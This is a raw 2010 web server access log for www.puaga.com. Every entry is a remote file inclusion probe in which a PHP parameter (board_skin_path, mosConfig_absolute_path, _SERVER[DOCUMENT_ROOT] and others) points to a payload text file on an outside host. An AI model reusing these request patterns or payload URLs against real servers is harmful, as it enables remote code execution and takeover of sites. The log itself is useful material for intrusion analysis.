219.94.193.152 - - [24/Feb/2010:05:28:32 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:28:42 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:28:54 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:28:54 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:28:55 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:29:19 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:29:19 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:29:20 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:29:20 -0800] "GET /delete_all.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:29:32 -0800] "GET /logs/access_091220.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:29:32 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:29:32 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:29:39 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:29:39 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:29:48 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:29:52 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.172.26 - - [24/Feb/2010:05:30:08 -0800] "GET /logs/access_100130.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:05:30:27 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:30:30 -0800] "GET /logs/access_100126.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:30:30 -0800] "GET /logs/access_100201.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:30:30 -0800] "GET /logs///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:05:30:31 -0800] "GET //admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:32:19 -0800] "GET /logs/access.log//bbs///////write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:32:20 -0800] "GET /logs//bbs///////write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:32:24 -0800] "GET /bbs///////write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:05:32:41 -0800] "GET /logs/access_100128.log//bbs///////write_update.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:01 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:01 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:01 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:06 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:22 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:22 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:22 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:34:22 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:34:37 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:34:37 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:34:37 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:34:39 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:36:17 -0800] "GET /logs/access_100205.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:36:17 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:36:17 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:05:36:32 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:05:36:32 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:05:36:32 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:36:37 -0800] "GET /logs/access_100203.log//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:20 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:20 -0800] "GET /logs/access_100209.log/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:20 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:20 -0800] "GET /logs/access_100212.log/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:34 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:34 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [24/Feb/2010:05:37:34 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:38:19 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:38:19 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:38:20 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:30 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:30 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:30 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:38:49 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:53 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:53 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:38:53 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:04 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:04 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:04 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:19 -0800] "GET /logs/access_100130.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:22 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:22 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:22 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:44 -0800] "GET /logs/access_100130.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:39:50 -0800] "GET /logs/access_100130.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:39:57 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:39:57 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:39:57 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [24/Feb/2010:05:39:57 -0800] "GET /logs/access_100122.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:40:00 -0800] "GET /logs/access_100130.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:40:17 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:40:18 -0800] "GET /logs//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:40:18 -0800] "GET /logs/access_100125.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:40:32 -0800] "GET /delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:40:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:40:32 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.6.109.50 - - [24/Feb/2010:05:40:54 -0800] "GET /logs/access_100203.log%20%20//delete_all.php?board_skin_path=http://sinhwatech.com//V1/member/copyme.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [24/Feb/2010:05:40:57 -0800] "GET /logs/access.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:41:01 -0800] "GET /logs/access_100130.log%20%20//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:41:44 -0800] "GET /logs/access_100212.log/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:41:44 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:41:44 -0800] "GET /logs/access_100209.log/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:05:41:44 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:42:06 -0800] "GET /logs/access_100126.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [24/Feb/2010:05:42:06 -0800] "GET /logs/access_100201.log///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:42:17 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:42:17 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [24/Feb/2010:05:42:17 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:42:20 -0800] "GET /logs/access_100119.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:42:20 -0800] "GET /logs/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:42:20 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:43:02 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:43:04 -0800] "GET /logs/access_100125.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:43:10 -0800] "GET /logs/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:43:10 -0800] "GET /logs/access_100119.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:05:43:11 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:43:40 -0800] "GET /logs/access_100130.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:44 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:45 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:45 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:43:45 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.128.138.73 - - [24/Feb/2010:05:43:55 -0800] "GET /logs/access_100130.log//modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:27 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:27 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:27 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:34 -0800] "GET /logs/access_100201.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:34 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:05:44:34 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
